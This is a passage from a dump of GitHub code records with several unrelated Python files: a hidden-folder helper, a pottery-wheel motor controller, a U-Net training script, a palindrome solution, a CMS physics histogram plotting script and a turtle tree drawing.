print(outliers(2001))","repo_name":"RafayAK/CodingPrep","sub_path":"DailyCodingProblem/70_Microsoft_Perfect_Numbers_Sum_to_10.py","file_name":"70_Microsoft_Perfect_Numbers_Sum_to_10.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"2824601222","text":"import os\nimport ctypes\n\n\nclass FileUtils:\n @staticmethod\n def create_hidden_folder(folder_name):\n # 當前工作目錄\n current_directory = os.getcwd()\n\n # 完整路徑\n path = os.path.join(current_directory, folder_name)\n\n # 建立資料夾\n os.makedirs(path, exist_ok=True)\n\n # 在Windows下設置資料夾為隱藏\n if os.name == \"nt\":\n FILE_ATTRIBUTE_HIDDEN = 0x02\n ret = ctypes.windll.kernel32.SetFileAttributesW(path, FILE_ATTRIBUTE_HIDDEN)\n\n if not ret:\n print(\n f\"Could not set {folder_name} as hidden. Error code: {ctypes.GetLastError()}\"\n )\n","repo_name":"MoonShineVFX/smaug-cmd","sub_path":"smaug_cmd/ui/file_util.py","file_name":"file_util.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40378564035","text":"from micropython import const\nfrom machine import Pin\n\nfrom libs.PID import PID\n\nfrom config import Config\nfrom display import Display\nfrom on_off_switch import OnOffSwitch\nfrom pedal_input import PedalInput\nfrom rotary import Rotary\nfrom speed_measure import Tachometer\nfrom speed_control import SpeedControl\n\n\nclass PotteryWheelManager:\n STOPPED_HOLD_STATE = const(\"STOPPED_HOLD\") # when first stopping, we stop motor and wait for safety conditions\n STOPPED_WAIT_STATE = const(\"STOPPED_WAIT\") # once safety conditions are met we wait for indication to start running\n RUNNING_STATE = const(\"RUNNING\")\n\n def __init__(self, pedal_input: PedalInput, main_switch: OnOffSwitch, tachometer: Tachometer,\n speed_control: SpeedControl, display: Display, rotary: Rotary) -> None:\n super().__init__()\n\n self.pedal_input = pedal_input\n self.main_switch = main_switch\n self.tachometer = tachometer\n self.speed_control = speed_control\n self.display = display\n self.rotary = rotary\n self.rotary.add_handler(self.create_rotary_event_handler())\n\n self._state = self.STOPPED_HOLD_STATE\n self._maxRpm = Config.DEFAULT_MAX_RPM\n\n def create_rotary_event_handler(self):\n \"\"\"create a callback with no \"self\" parameter, so it can be passed as a handler\"\"\"\n def event_handler(event_type):\n if event_type == Rotary.ROT_CW:\n self._maxRpm = min(self._maxRpm + 1, Config.MAX_SUPPORTED_RPM)\n elif event_type == Rotary.ROT_CCW:\n self._maxRpm = min(self._maxRpm - 1, Config.MAX_SUPPORTED_RPM)\n elif event_type == Rotary.SW_PRESS:\n print('PRESS')\n elif event_type == Rotary.SW_RELEASE:\n print('RELEASE')\n\n return event_handler\n\n def loop(self):\n percentage = self.pedal_input.get_pedal_percentage()\n current_speed = self.tachometer.get_current_rpm()\n\n if self._state == self.STOPPED_HOLD_STATE:\n # make sure we are switched off\n self.main_switch.switch_off()\n self.speed_control.set_speed(0)\n if percentage == 0:\n self._state = self.STOPPED_WAIT_STATE\n\n elif self._state == self.STOPPED_WAIT_STATE:\n # if we made it here, we are already giving stop signals\n\n if percentage > 0: # This indicates we need to start running\n self._state = self._state = self.RUNNING_STATE\n\n elif self._state == self.RUNNING_STATE:\n self.main_switch.switch_on()\n","repo_name":"alonkashtan/pottery-wheel-control","sub_path":"pottery-wheel-manager.py","file_name":"pottery-wheel-manager.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14149509357","text":"from keras.callbacks import TensorBoard, ModelCheckpoint, EarlyStopping\nfrom model_UNet import get_unet, UNetEvaluator\nfrom config import *\nfrom generators import get_seg_batch\nimport time\n\ndef seg_train():\n print('start seg_train')\n model = get_unet()\n model.summary()\n\n run = '{}-{}'.format(time.localtime().tm_hour, time.localtime().tm_min)\n log_dir = SEG_LOG_DIR.format(run)\n check_point = log_dir + '/checkpoint-{epoch:02d}-{val_loss:.4f}.hdf5'\n\n print(\"seg train round {}\".format(run))\n tensorboard = TensorBoard(log_dir=log_dir, write_graph=False)\n checkpoint = ModelCheckpoint(filepath=check_point, monitor='val_loss', verbose=1, save_best_only=True)\n early_stopping = EarlyStopping(monitor='val_loss', patience=TRAIN_SEG_EARLY_STOPPING_PATIENCE, verbose=1)\n evaluator = UNetEvaluator()\n model.fit_generator(get_seg_batch(TRAIN_SEG_TRAIN_BATCH_SIZE, from_train=True), steps_per_epoch=TRAIN_SEG_STEPS_PER_EPOCH,\n validation_data=get_seg_batch(TRAIN_SEG_VALID_BATCH_SIZE, from_train=False), validation_steps=TRAIN_SEG_VALID_STEPS,\n epochs=TRAIN_SEG_EPOCHS, verbose=2,\n callbacks=[tensorboard, checkpoint, early_stopping, evaluator])\n\nif __name__ == '__main__':\n seg_train()\n","repo_name":"wikke/Tianchi-Medical-LungTumorDetect","sub_path":"train_segmentation.py","file_name":"train_segmentation.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":381,"dataset":"github-code","pt":"67"} +{"seq_id":"28027270327","text":"\"\"\"\nGiven a string s, return the longest\npalindromic\n\nsubstring\n in s.\n\n\n\nExample 1:\n\nInput: s = \"babad\"\nOutput: \"bab\"\nExplanation: \"aba\" is also a valid answer.\nExample 2:\n\nInput: s = \"cbbd\"\nOutput: \"bb\"\n\"\"\"\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n n = len(s)\n if n < 2:\n return s\n start, max_len = 0, 1\n for i in range(n):\n odd = s[i - max_len - 1: i + 1]\n even = s[i - max_len: i + 1]\n # print('odd:', odd, ' even:' ,even,'i:', i,'start:', start,'max_lan:', max_len, i - max_len - 1, i - max_len)\n if i - max_len - 1 >= 0 and odd == odd[::-1]:\n start = i - max_len - 1\n max_len += 2\n continue\n if i - max_len >= 0 and even == even[::-1]:\n start = i - max_len\n max_len += 1\n return s[start: start + max_len]\n\nprint(Solution().longestPalindrome('abcdeedcba'))\n","repo_name":"laxman590249/Data-Structures","sub_path":"DataStructures/Strings/longest_palindromic_substring.py","file_name":"longest_palindromic_substring.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4890755178","text":"import ROOT\nimport CMS_lumi, tdrstyle\nimport array\nfrom subprocess import Popen\nfrom sys import argv, exit, stdout, stderr\nimport math\n\nROOT.gROOT.SetBatch(True)\n\nsaveWhere= '/afs/hep.wisc.edu/home/tost/workingArea/CMSSW_8_0_24_patch1/src/Real_work/oct12plots/'\n\n#filenumber = raw_input(\"How many files to plot? \")\nfilenumber = str(5)\ntitle = \"words\"\n\n#legend_title = []\ninfile = []\nfor n in range(0, int(filenumber)):\n infile.append(argv[n+1])\n #legend_title.append(raw_input(\"What to label \"+str(infile[n])+\": \"))\n\n#some sloppy programming is going to go here\nlegend_title = []\nlegend_title.append(\"Znunu\")\nlegend_title.append(\"smH125\")\nlegend_title.append(\"W+jets\")\nlegend_title.append(\"DiBoson\")\nlegend_title.append(\"Z+jets\")\n\n\n\n########################## All cuts go here ########################\ndef muTauCutTester(event):\n if event.met>150 and event.m_vis<125 and event.pth>120 and event.dR<1.7 and event.pt_1>26 and event.pt_2>20 and event.npv>0 and event.diLeptons==0 and event.charge==0 and event.againstElectronVLooseMVA6_2 > 0 and event.againstMuonTight3_2>0 and event.iso04_1<0.15 and (event.HLT_IsoMu24_v_fired>0 or event.HLT_IsoTkMu24_v_fired>0) and event.byTightIsolationMVArun2v1DBoldDMwLT_2>0 and event.BadMuonFilter==1 and event.Flag_eeBadScFilter_fired == 1 and event.Flag_HBHENoiseFilter_fired == 1 and event.Flag_HBHENoiseIsoFilter_fired == 1 and event.Flag_goodVertices_fired == 1 and event.Flag_EcalDeadCellTriggerPrimitiveFilter_fired == 1:\n return True\ndef eleTauCutTester(event):\n if event.met>150 and event.pth>120 and event.m_vis<125 and event.dR<1.7 and event.pt_1>26 and event.pt_2>20 and event.vertices>0 and event.dilepton_veto==0 and event.iso_1<0.1 and event.tightElectrons<=1 and event.tightMuons==0 and event.charge==0 and event.againstElectronTightMVA6_2 > 0 and event.againstMuonLoose3_2>0 and event.byTightIsolationMVArun2v1DBoldDMwLT_2>0 and event.BadMuonFilter==1 and event.Flag_HBHENoiseFilter_fired==1 and event.Flag_HBHENoiseIsoFilter_fired==1 and event.Flag_globalTightHalo2016Filter_fired==1 and event.Flag_goodVertices_fired==1 and event.Flag_EcalDeadCellTriggerPrimitiveFilter_fired==1:\n return True\ndef diTauCutTester(event):\n if event.met>160 and event.m_vis<125 and event.pth>120 and event.dR<2.1 and event.pt_1>55 and event.pt_2>40 and event.npv>0 and event.tightMuons==0 and event.tightElectrons==0 and event.againstMuonLoose3_1>0 and event.againstElectronVLooseMVA6_1>0 and event.againstElectronVLooseMVA6_2>0 and event.charge==0 and (event.HLT_DoubleMediumIsoPFTau35_Trk1_eta2p1_Reg_v_fired>0 or event.HLT_DoubleMediumCombinedIsoPFTau35_Trk1_eta2p1_Reg_v_fired>0):\n return True\ndef datamuTauCutTester(event):\n if event.BadMuonFilter==1 and event.Flag_eeBadScFilter_fired == 1 and event.Flag_HBHENoiseFilter_fired == 1 and event.Flag_HBHENoiseIsoFilter_fired == 1 and event.Flag_goodVertices_fired == 1 and event.Flag_EcalDeadCellTriggerPrimitiveFilter_fired == 1:\n return True\ndef dataeleTauCutTester(event):\n if event.Flag_eeBadScFilter_fired==1 and event.BadMuonFilter==1 and event.Flag_HBHENoiseFilter_fired==1 and event.Flag_HBHENoiseIsoFilter_fired==1 and event.Flag_globalTightHalo2016Filter_fired==1 and event.Flag_goodVertices_fired==1 and event.Flag_EcalDeadCellTriggerPrimitiveFilter_fired==1:\n return True\n#########################################################################\n\ncolors = [ROOT.kRed, ROOT.kBlue, ROOT.kMagenta, ROOT.kCyan, ROOT.kOrange, ROOT.kSpring, ROOT.kTeal, ROOT.kAzure, ROOT.kPink, ROOT.kYellow]\nchannels = [\"eTau\", \"diTau\"]\nvariables = [\"pt_1\", \"pt_2\", \"dR\", \"pth\", \"m_vis\", \"mt12\", \"npv\", \"mt_1\", \"mt_2\", \"njets\", \"jpt_1\", \"jpt_2\", \"tauDecayMode\", \"nIsoNeutral\"]\n\n\nfor j in range(0, 2):\n for k in range(0, 14):\n channel = channels[j]\n variable = variables[k]\n\n if channel == \"diTau\":\n label = \"#tau_{h}#tau_{h} \"\n if channel == \"muTau\":\n label = \"#mu#tau_{h} \"\n if channel == \"eTau\":\n label = \"e#tau_{h} \"\n\n xaxis = variable\n ratioplot = \"n\"\n if variable == \"pt_1\":\n topbin = 200\n bottombin = 0\n binnumber = 20\n if variable == \"pt_2\":\n topbin = 200\n bottombin = 0\n binnumber = 20\n if variable == \"dR\":\n topbin = 2 \n bottombin = 0\n binnumber = 20\n if variable == \"pth\":\n topbin = 350\n bottombin = 100\n binnumber = 25\n if variable == \"m_vis\":\n topbin = 120\n bottombin = 0\n binnumber = 25\n if variable == \"mt12\":\n topbin = 200\n bottombin = 0\n binnumber = 20\n if variable == \"npv\":\n topbin =80\n bottombin =0\n binnumber =30\n if variable == \"mt_1\":\n topbin = 250\n bottombin = 0\n binnumber = 25\n if variable == \"mt_2\":\n topbin = 250\n bottombin = 0\n binnumber = 25\n if variable == \"njets\":\n topbin = 7\n bottombin = 0\n binnumber = 8\n if variable == \"jpt_1\":\n topbin = 500\n bottombin = 0\n binnumber = 25\n if variable == \"jpt_2\":\n topbin = 500\n bottombin = 0\n binnumber = 25\n if variable == \"tauDecayMode\":\n topbin = 10\n bottombin = 0\n binnumber = 10\n if variable == \"nIsoNeutral\":\n topbin = 5\n bottombin = 0\n binnumber = 20\n\n\n\n\n\n #set the tdr style \n tdrstyle.setTDRStyle()\n ROOT.gStyle.SetOptStat(2210)\n ROOT.gStyle.SetTitleAlign(13)\n\n #change the CMS_lumi variables (see CMS_lumi.py) \n CMS_lumi.lumi_13TeV =str(label)+ \"35.9 fb^{-1}\"\n CMS_lumi.writeExtraText = 1\n CMS_lumi.extraText = \"Preliminary\"\n CMS_lumi.lumi_sqrtS = \"13 TeV\" \n # used with iPeriod = 0, e.g. for simulation-only plots (default is an empty string) \n iPos = 11\n if( iPos==0 ): CMS_lumi.relPosX = 0.12\n H_ref = 800;\n W_ref = 800;\n W = W_ref\n H = H_ref\n iPeriod = 4\n # references for T, B, L, R \n T = 0.08*H_ref\n B = 0.12*H_ref\n L = 0.12*W_ref\n R = 0.04*W_ref\n B_ratio = 0.1*H_ref\n T_ratio = 0.03*H_ref\n B_ratio_label = 0.3*H_ref\n canvas1 = ROOT.TCanvas(\"c2\",\"c2\",50,50,W,H)\n canvas1.SetFillColor(0)\n canvas1.SetBorderMode(0)\n canvas1.SetFrameFillStyle(0)\n canvas1.SetFrameBorderMode(0)\n canvas1.SetTickx(0)\n canvas1.SetTicky(0)\n stacks1 = ROOT.THStack(\"stacks1\",\"\")\n x1_l = 0.93\n y1_l = 0.90\n dx_l = 0.38\n dy_l = 0.20\n x0_l = x1_l-dx_l\n y0_l = y1_l-dy_l\n\n\n if (ratioplot != \"y\"):\n canvas1.SetLeftMargin( L/W )\n canvas1.SetRightMargin( R/W )\n canvas1.SetTopMargin( T/H )\n canvas1.SetBottomMargin( B/H )\n\n\n canvas1.cd()\n\n if (ratioplot == \"y\"):\n plotPad = ROOT.TPad(\"plotpad\",\"\",0.0,0.3,1.0,1.0)\n plotPad.SetLeftMargin(L/W)\n plotPad.SetRightMargin(R/W)\n plotPad.SetTopMargin(T/H)\n plotPad.SetBottomMargin(B_ratio/H)\n plotPad.SetFillColor(0)\n plotPad.SetBottomMargin(0)\n\n ratioPad = ROOT.TPad(\"ratioPad\",\"\",0.0,0.0,1.0,0.31)\n ratioPad.SetLeftMargin(L/W)\n ratioPad.SetRightMargin(R/W)\n ratioPad.SetTopMargin(T_ratio/H)\n ratioPad.SetBottomMargin(B_ratio_label/H)\n ratioPad.SetGridy(1)\n ratioPad.SetFillColor(4000)\n\n if (ratioplot != \"y\"):\n plotPad = ROOT.TPad(\"plotPad\",\"\",0.0,0.0,1.0,1.0)\n plotPad.SetLeftMargin(L*1.4/W)\n plotPad.SetRightMargin(R/W)\n plotPad.SetTopMargin(T/H)\n plotPad.SetBottomMargin(B/H)\n\n plotPad.Draw()\n plotPad.cd()\n\n\n\n####################################### \n legend = ROOT.TLegend(x0_l,y0_l,x1_l, y1_l,\"\",\"brNDC\")\n legend.SetFillColor(ROOT.kWhite)\n legend.SetBorderSize(1)\n\n histo = {str(0):ROOT.TH1F(\"histo0\",title,int(binnumber),float(bottombin),float(topbin)), str(1):ROOT.TH1F(\"histo1\",title,int(binnumber),float(bottombin),float(topbin)), str(2):ROOT.TH1F(\"histo2\",title,int(binnumber),float(bottombin),float(topbin)), str(3):ROOT.TH1F(\"histo3\",title,int(binnumber),float(bottombin),float(topbin)), str(4):ROOT.TH1F(\"histo4\",title,int(binnumber),float(bottombin),float(topbin)), str(5):ROOT.TH1F(\"histo5\",title,int(binnumber),float(bottombin),float(topbin)), str(6):ROOT.TH1F(\"histo6\",title,int(binnumber),float(bottombin),float(topbin)), str(7):ROOT.TH1F(\"histo7\",title,int(binnumber),float(bottombin),float(topbin)), str(8):ROOT.TH1F(\"histo8\",title,int(binnumber),float(bottombin),float(topbin)), str(9):ROOT.TH1F(\"histo9\",title,int(binnumber),float(bottombin),float(topbin))}\n\n\n signal = ROOT.TH1F(\"signal\",title, int(binnumber),float(bottombin), float(topbin))\n signalfile = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/ZpBaryonic_Zp1000_MChi150.root\")\n\n################################################ \n\n\n if channel == \"muTau\":\n signaltree = signalfile.Get(\"muTauEventTree/eventTree\")\n for event in signaltree:\n g = getattr(event, variable)\n zptweight = getattr(event, \"ZPt_reweight\")\n wptweight = getattr(event, \"WPt_reweight\")\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n pogid1 = getattr(event, \"POGid1\")\n pogtrigger = getattr(event, \"POGtrigger\")\n tauid1 = getattr(event, \"TAUID1\")\n trackweight = getattr(event, \"trackweight\")\n if muTauCutTester(event):\n signal.Fill(g, 35870*zptweight*wptweight*weight*genweight*puweight*pogid1*pogtrigger*tauid1*trackweight)\n if channel == \"eTau\":\n signaltree = signalfile.Get(\"eleTauEventTree/eventTree\")\n for event in signaltree:\n g = getattr(event, variable)\n zptweight = getattr(event, \"ZPt_reweight\")\n wptweight = getattr(event, \"WPt_reweight\")\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n tauid1 = getattr(event, \"TAUID1\")\n idisoweight = getattr(event, \"idisoweight_REDO\")\n trigweight = getattr(event, \"trigweight_REDO\")\n trackweight = getattr(event, \"trackweight\")\n if eleTauCutTester(event):\n signal.Fill(g, 35870*zptweight*wptweight*weight*genweight*puweight*tauid1*idisoweight*trigweight*trackweight)\n if channel == \"diTau\":\n signaltree = signalfile.Get(\"diTauEventTree/eventTree\")\n for event in signaltree:\n g = getattr(event, variable)\n zptweight = getattr(event, \"ZPt_reweight\")\n wptweight = getattr(event, \"WPt_reweight\")\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n trigweight = getattr(event, \"trigweight_REDO\")\n tauid1 = getattr(event, \"TAUID1\")\n if diTauCutTester(event):\n signal.Fill(g, 35870*zptweight*wptweight*weight*genweight*puweight*trigweight*tauid1)\n\n\n signal.SetLineColor(ROOT.kRed)\n\n\n\n if channel == \"muTau\":\n datafile1 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAB.root\")\n datafile2 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAC.root\")\n datafile3 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAD.root\")\n datafile4 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAE.root\")\n datafile5 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAF.root\")\n datafile6 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAG.root\")\n datafile7 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAH2.root\")\n datafile8 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/muDATAH3.root\")\n if channel == \"eTau\":\n datafile1 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAB.root\")\n datafile2 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAC.root\")\n datafile3 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAD.root\")\n datafile4 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAE.root\")\n datafile5 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAF.root\")\n datafile6 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAG.root\")\n datafile7 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAH2.root\")\n datafile8 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/eleDATAH3.root\")\n if channel == \"diTau\":\n datafile1 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAB.root\")\n datafile2 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAC.root\")\n datafile3 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAD.root\")\n datafile4 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAE.root\")\n datafile5 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAF.root\")\n datafile6 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAG.root\")\n datafile7 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAH2.root\")\n datafile8 = ROOT.TFile(\"/nfs_scratch/tost/monohiggs_Aug13/tauDATAH3.root\")\n\n\n\n\n\n data = ROOT.TH1F(\"data\",title,int(binnumber),float(bottombin),float(topbin))\n if channel == \"muTau\":\n datatree = datafile1.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile1.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile1.Get(\"diTauEventTree/eventTree\")\n q=0\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 1: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile2.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile2.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile2.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel == \"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel == \"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 2: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile3.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile3.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile3.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 3: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile4.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile4.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile4.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 4: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile5.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile5.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile5.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 5: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile6.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile6.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile6.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 6: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile7.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile7.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile7.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 7: \"+str(q))\n if channel == \"muTau\":\n datatree = datafile8.Get(\"muTauEventTree/eventTree\")\n if channel ==\"eTau\":\n datatree = datafile8.Get(\"eleTauEventTree/eventTree\")\n if channel ==\"diTau\":\n datatree = datafile8.Get(\"diTauEventTree/eventTree\")\n for event in datatree:\n g = getattr(event, variable)\n if channel ==\"muTau\":\n if muTauCutTester(event) and datamuTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"eTau\":\n if eleTauCutTester(event) and dataeleTauCutTester(event):\n data.Fill(g)\n q=q+1\n if channel ==\"diTau\":\n if diTauCutTester(event):\n data.Fill(g)\n q=q+1\n print (\"Events passed after 8: \"+str(q))\n\n\n\n data.SetMarkerStyle(20)\n data.SetMarkerSize(1.0)\n data.SetLineColor(ROOT.kBlack)\n\n\n\n for i in range(0, int(filenumber)):\n ntuple_file = ROOT.TFile(infile[i])\n print (channel)\n if channel == \"muTau\":\n tree = ntuple_file.Get(\"muTauEventTree/eventTree\")\n if channel == \"eTau\":\n tree = ntuple_file.Get(\"eleTauEventTree/eventTree\")\n if channel == \"diTau\":\n tree = ntuple_file.Get(\"diTauEventTree/eventTree\")\n for event in tree:\n g = getattr(event, variable)\n zptweight = getattr(event, \"ZPt_reweight\")\n wptweight = getattr(event, \"WPt_reweight\")\n if channel == \"muTau\":\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n pogid1 = getattr(event, \"POGid1\")\n pogtrigger = getattr(event, \"POGtrigger\")\n tauid1 = getattr(event, \"TAUID1\")\n trackweight = getattr(event, \"trackweight\")\n if muTauCutTester(event):\n histo[str(i)].Fill(g, weight*genweight*puweight*pogid1*pogtrigger*tauid1*trackweight*35.9*1000*zptweight*wptweight)\n if channel == \"eTau\":\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n tauid1 = getattr(event, \"TAUID1\")\n idisoweight = getattr(event, \"idisoweight_REDO\")\n trigweight = getattr(event, \"trigweight_REDO\")\n trackweight = getattr(event, \"trackweight\")\n if eleTauCutTester(event):\n histo[str(i)].Fill(g, weight*genweight*puweight*tauid1*idisoweight*trigweight*trackweight*35.9*1000*zptweight*wptweight)\n if channel == \"diTau\":\n weight = getattr(event, \"__WEIGHT__\")\n genweight = getattr(event, \"GENWEIGHT\")\n puweight = getattr(event, \"puweight\")\n trigweight = getattr(event, \"trigweight_REDO\")\n tauid1 = getattr(event, \"TAUID1\")\n if diTauCutTester(event):\n histo[str(i)].Fill(g, weight*genweight*puweight*trigweight*tauid1*35.9*1000*zptweight*wptweight)\n \n\n\n i = 0\n\n for q in range(0,int(filenumber)):\n histo[str(q)].SetFillColor(colors[q])\n histo[str(q)].SetLineColor(ROOT.kBlack)\n legend.AddEntry(histo[str(q)], legend_title[q],\"f\")\n\n legend.AddEntry(signal, \"Signal\", \"l\")\n legend.AddEntry(data, \"Observed\",\"P\")\n \n\n for w in range(0, int(filenumber)):\n stacks1.Add(histo[str(w)])\n\n\n canvas1.SetLogy()\n stacks1.Draw(\"HIST\")\n signal.Draw(\"HIST SAME\")\n\n if (data.GetMaximum() > stacks1.GetMaximum()):\n stacks1.SetMaximum(data.GetMaximum()*1.4)\n if (data.GetMaximum() <= stacks1.GetMaximum()):\n stacks1.SetMaximum(stacks1.GetMaximum()*1.4)\n\n data.Draw(\"e,SAME\")\n CMS_lumi.CMS_lumi(canvas1, iPeriod, iPos)\n stacks1.GetXaxis().SetTitle(xaxis)\n stacks1.GetXaxis().SetLabelSize(0.035)\n \n\n \n canvas1.Modified()\n canvas1.cd()\n canvas1.Update()\n canvas1.RedrawAxis()\n frame = canvas1.GetFrame()\n frame.Draw()\n\n legend.Draw(\"same\")\n saveas = saveWhere+channel+variable+'.png'\n canvas1.Update()\n canvas1.SaveAs(saveas)\n canvas1\n\n signalfile.Close()\n datafile1.Close()\n datafile2.Close()\n datafile3.Close()\n datafile4.Close()\n datafile5.Close()\n datafile6.Close()\n datafile7.Close()\n datafile8.Close()\n ntuple_file.Close()\n","repo_name":"marctost/CMS-files","sub_path":"makeplots.py","file_name":"makeplots.py","file_ext":"py","file_size_in_byte":25391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34974329970","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom turtle import * # turtle 기능을 읽어 들임\n\ndef tree(length):\n # 나무를 그리는 함수\n if length > 5:\n forward(length)\n right(20)\n tree(length-15)\n left(40)\n tree(length-15)\n right(20)\n 